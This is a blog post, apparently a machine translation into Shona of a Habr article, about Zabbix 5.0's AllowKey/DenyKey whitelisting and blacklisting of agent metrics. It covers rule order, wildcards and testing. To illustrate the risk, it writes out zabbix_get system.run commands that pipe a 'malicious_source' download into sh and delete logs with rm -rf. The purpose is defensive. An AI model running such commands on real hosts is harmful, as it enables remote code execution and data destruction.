ProHoster > Blog > Utongi > Blacklist uye whitelist rutsigiro rweagent-side metrics muZabbix 5.0

Blacklist uye whitelist rutsigiro rweagent-side metrics muZabbix 5.0

Blacklist uye whitelist rutsigiro rweagent-side metrics muZabbix 5.0

Blacklist uye whitelist rutsigiro rweagent-side metrics

Tikhon Uskov, Integration Engineer, Zabbix

Data kuchengetedza nyaya

Zabbix 5.0 ine chinhu chitsva chinokutendera kuti uvandudze chengetedzo mumasisitimu uchishandisa Zabbix Agent uye inotsiva yekare parameter. EnableRemoteCommands.

Kuvandudzwa kwekuchengetedzwa kweagent-based systems kunobva pakuti mumiririri anogona kuita nhamba huru yezviito zvinogona kuva nengozi.

  • Mumiririri anogona kuunganidza chero ruzivo, kusanganisira zvakavanzika kana ruzivo rwungangove nengozi, kubva kumafaira ekumisikidza, faira regi, mafaera epassword, kana chero mamwe mafaera.

Semuenzaniso, uchishandisa zabbix_get utility unogona kuwana runyoro rwevashandisi, madhairekitori epamba, mafaera epassword, nezvimwe.

Blacklist uye whitelist rutsigiro rweagent-side metrics muZabbix 5.0

Kuwana data uchishandisa zabbix_get utility

ONA. Dhata inogona kudzoserwa chete kana mumiriri averenga mvumo pafaira rinoenderana. Asi, semuenzaniso, iyo faira /etc/passwd/ inoverengwa nevashandisi vese.

  • Mumiririri anogona zvakare kuita mirairo ine njodzi. Semuenzaniso, kiyi *system.run[]** inokutendera kuti uite chero mirairo iri kure panetiweki node, kusanganisira kuita zvinyorwa kubva kuZabbix web interface iyo zvakare inoita mirairo kudivi remumiririri. 

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

  • PaLinux, mumiriri anomhanya nekusarudzika pasina midzi ropafadzo, nepo paWindows inomhanya sevhisi seSystem uye ine isina kurambidzwa kupinda kune iyo faira system. Saizvozvo, kana pasina shanduko inoitwa kuZabbix Agent paramita mushure mekuiswa, mumiriri anogona kuwana registry, faira system uye anogona kuita mibvunzo yeWMI.

Mushanduro dzekutanga parameter EnableRemoteCommands=0 inobvumirwa chete kudzima metric nekiyi *system.run[]** uye kushandisa zvinyorwa kubva pawebhu interface, asi pakanga pasina nzira yekurambidza kupinda kune ega mafaera, bvumidza kana kudzima makiyi ega ega aive akaiswa nemumiririri, kana kudzikamisa kushandiswa kweumwe neumwe paramita.

Blacklist uye whitelist rutsigiro rweagent-side metrics muZabbix 5.0

Uchishandisa iyo EnableRemoteCommand parameter mune zvekare mavhezheni eZabbix

BvumiraKey/DenyKey

Zabbix 5.0 inobatsira kudzivirira kubva pakuwanikwa kusingatenderwe kwakadaro nekupa whitelists uye blacklists yekubvumira uye kuramba metrics kudivi remumiririri.

MuZabbix 5.0 makiyi ese, kusanganisira *system.run[]** inogoneswa, uye maviri matsva ekugadzirisa agent akawedzerwa:

AllowKey= - macheki anobvumirwa;

DenyKey= - cheki dzakarambidzwa;

iripi patani yezita rekiyi ine paramita inoshandisa metacharacters (*).

Makiyi eAllowKey neDenyKey anobvumidza iwe kubvumidza kana kuramba metrics ega ega zvichienderana neyakasiyana pateni. Kusiyana nemamwe maparamita ekugadzirisa, nhamba yeAllowKey/DenyKey parameter haina kuganhurirwa. Izvi zvinokutendera kuti utsanangure zvakajeka izvo chaizvo izvo mumiririri anogona kuita muhurongwa nekugadzira muti wekutarisa - makiyi eexecutable, uko kurongeka kwavanonyorwa kunoita basa rakakosha.

Kutevedzana kwemitemo

Mitemo inotariswa muhurongwa hwavanopinzwa nayo mufaira rekugadzirisa. Kiyi inotariswa maererano nemitemo isati yatanga mutambo, uye nekukurumidza kana kiyi ye data data ichienderana nemuenzaniso, inobvumirwa kana kurambwa. Mushure meizvi, kutonga kwekutarisa kunomira uye makiyi akasara anofuratirwa.

Naizvozvo, kana chinhu chichienderana nemvumo uye mutemo wekuramba, mhedzisiro ichaenderana nekuti ndeupi mutemo unotanga mufaira rekugadzirisa.

Blacklist uye whitelist rutsigiro rweagent-side metrics muZabbix 5.0

Mitemo miviri yakasiyana ine patani imwechete uye kiyi vfs.file.size[/tmp/file]

Kurongeka kwekushandisa makiyi AllowKey/DenyKey:

  1. mitemo chaiyo,
  2. general mitemo,
  3. mutemo unorambidza.

Semuenzaniso, kana iwe uchida kuwana mafaera mune imwe dhairekitori, unofanira kutanga wabvumira kupinda kwazviri, wobva waramba zvimwe zvese zvisingawire mukati memvumo dzakatarwa. Kana mutemo wekuramba ukatanga kushandiswa, kupinda kune folda kunorambwa.

Blacklist uye whitelist rutsigiro rweagent-side metrics muZabbix 5.0

Kutevedzana kwakarurama

Kana iwe uchida kubvumira 2 zvishandiso kuti zvifambe kuburikidza ne *system.run[]**, uye mutemo wekuramba uchatsanangurwa kutanga, zvishandiso hazvizotangwa, nekuti yekutanga pateni inogara ichienderana chero kiyi, uye inotevera mitemo icharegererwa.

Blacklist uye whitelist rutsigiro rweagent-side metrics muZabbix 5.0

Kutevedzana kusina kururama

Mapatani

Mitemo inokosha

Patani ishoko rine makadhi emusango. Metacharacter (*) inofanana nenhamba chero ipi zvayo yemavara pane imwe nzvimbo. Mametacharacter anogona kushandiswa zvese muzita rakakosha uye mumaparamita. Semuenzaniso, unogona kunyatso kutsanangura yekutanga parameter ine mavara, uye tsanangura inotevera sewildcard.

Maparamita anofanirwa kuvharirwa mumabhuraketi akaenzana [].

  • system.run[* - zvisizvo
  • vfs.file*.txt] - zvisizvo
  • vfs.file.*[*] - rudyi

Mienzaniso yekushandisa wildcard.

  1. Muzita rakakosha uye muparameter. Muchiitiko ichi, kiyi haienderane nekiyi yakafanana iyo isina parameter, sezvo mumuenzaniso takaratidza kuti tinoda kugashira imwe mhedziso yezita rinokosha uye imwe seti yeparameter.
  2. Kana iyo pateni isingashandisi masikweya mabhuraketi, iyo pateni inobvumira makiyi ese asina ma parameter uye anoramba makiyi ese ane parameter yakatarwa.
  3. Kana kiyi yakanyorwa zvizere uye maparamendi akatsanangurwa sewildcard, ichaenderana nekiyi yakafanana nechero parameter uye haizofananidze kiyi isina mabhuraketi emativi, i.e. ichabvumidzwa kana kurambwa.

Blacklist uye whitelist rutsigiro rweagent-side metrics muZabbix 5.0

Mitemo yekuzadza ma parameters.

  • Kana kiyi ine parameter inotarisirwa kushandiswa, iyo parameter inofanirwa kutsanangurwa mufaira rekugadzirisa. Maparamita anofanirwa kutsanangurwa semetacharacter. Izvo zvinodikanwa kuti unyatsoramba kuwana chero faira uye funga kuti ndeupi ruzivo rwunogona kupa metric pasi pezviperengo zvakasiyana - zvine uye pasina paramita.

Blacklist uye whitelist rutsigiro rweagent-side metrics muZabbix 5.0

Zvimiro zvekunyora makiyi ane parameters

  • Kana kiyi ichitsanangurwa ine parameter, asi iyo parameter ine sarudzo uye inotsanangurwa semetacharacter, kiyi isina parameter inogadziriswa. Semuenzaniso, kana iwe uchida kudzima ruzivo rwekugamuchira nezve mutoro paCPU uye tsanangura kuti system.cpu.load[*] kiyi inofanira kuvharwa, usakanganwa kuti kiyi isina ma parameter ichadzosa avhareji yekuremerwa kukosha.

Blacklist uye whitelist rutsigiro rweagent-side metrics muZabbix 5.0

Mitemo yekuzadza ma parameters

Zvinyorwa

kuchinja

  • Mimwe mitemo haigoni kuchinjwa nemushandisi, semuenzaniso, mitemo yekuwana kana agent auto-registration mitemo. BvumiraKey/DenyKey mitemo haikanganisi zvinotevera paramita:
    -HostnameItem
    - HostMetadataItem
    - HostInterfaceItem

ONA. Kana maneja akadzima kiyi, kana yabvunzwa, Zabbix haipe ruzivo rwekuti sei metric kana kiyi ichiwira muchikamu che 'HAKUNA KUTSIGWA'. Ruzivo nezve zvinorambidzwa pakuita mirairo iri kure hainawo kuratidzwa mumafaira emumiririri. Izvi ndezvezvikonzero zvekuchengetedza, asi zvinogona kunetsa kugadzirisa kana metrics ikawira muchikamu chisina kutsigirwa nekuda kwechimwe chikonzero..

  • Iwe haufanirwe kuvimba nechero hurongwa hwekubatanidza mafaera ekunze ekugadzirisa (semuenzaniso, mune alfabheti).

Command Line Utilities

Mushure mekugadzirisa mitemo, unofanirwa kuve nechokwadi chokuti zvinhu zvose zvakagadzirirwa zvakanaka.

Iwe unogona kushandisa imwe yezvitatu zvingasarudzwa:

  • Wedzera metric kuZabbix.
  • Edzai ne zabbix_agentd. Zabbix mumiririri ane sarudzo -dhinda (-p) inoratidza makiyi ese (ayo anotenderwa nekusarudzika) kunze kweaya asingabvumidzwe nekugadzirisa. Uye nesarudzo -test (-t) nekuti kiyi yakarambidzwa ichadzoka 'kiyi yechinhu isingatsigirwe'.
  • Edzai ne zabbix_get. Utility zabbix_get nesarudzo -k ndichadzoka'ZBX_NOTSUPPORTED: Metric isingazivikanwe'.

Bvumira kana kuramba

Iwe unogona kuramba kuwana faira uye simbisa, semuenzaniso, uchishandisa utility zabbix_getkuti kupinda mufaira kunorambwa.

Blacklist uye whitelist rutsigiro rweagent-side metrics muZabbix 5.0

**

ONA. Makotesheni muparameter haana hanya.

Muchiitiko ichi, kuwana faira yakadaro kunogona kubvumirwa kuburikidza neimwe nzira. Semuenzaniso, kana symlink ichitungamira kwairi.

Blacklist uye whitelist rutsigiro rweagent-side metrics muZabbix 5.0

Zvinokurudzirwa kutarisa sarudzo dzakasiyana dzekushandisa iyo yakatarwa mitemo, uye zvakare funga nezvemikana yekunzvenga zvinorambidzwa.

Mibvunzo neMhinduro

Mubvunzo wako. Sei chimiro chakaoma kudaro nemutauro waro chakasarudzwa kutsanangura mitemo, mvumo uye zvirambidzo? Sei zvakange zvisingaite kushandisa, semuenzaniso, matauriro anogara achishandiswa naZabbix?

Reply. Iyi inyaya ye regex yekuita sezvo pachiwanzo kungoita mumiriri mumwechete uye inotarisa huwandu hukuru hwemetrics. Regex ibasa rinorema uye hatigone kutarisa zviuru zvemetrics nenzira iyi. Wildcards - yepasi rose, inoshandiswa zvakanyanya uye iri nyore mhinduro.

Mubvunzo wako. Mafaira eIncludes haasanganisirwe muhurongwa hwearufabheti here?

Reply. Sekuziva kwangu, hazvibviri kufanotaura kurongeka kwemitemo ichashandiswa kana iwe ukaparadzira mitemo pamafaira akasiyana. Ini ndinokurudzira kuunganidza ese AllowKey / DenyKey mitemo mune imwe Inosanganisira faira, nekuti ivo vanodyidzana, uye kusanganisira iyi faira..

Mubvunzo wako. MuZabbix 5.0 iyo sarudzo 'EnableRemoteCommands=' inoshaikwa kubva pafaira rekugadzirisa, uye chete AllowKey/DenyKey iripo?

Pindura. Hongu ndizvozvo.

Бпасибо за вниманиС!

Source: www.habr.com

Voeg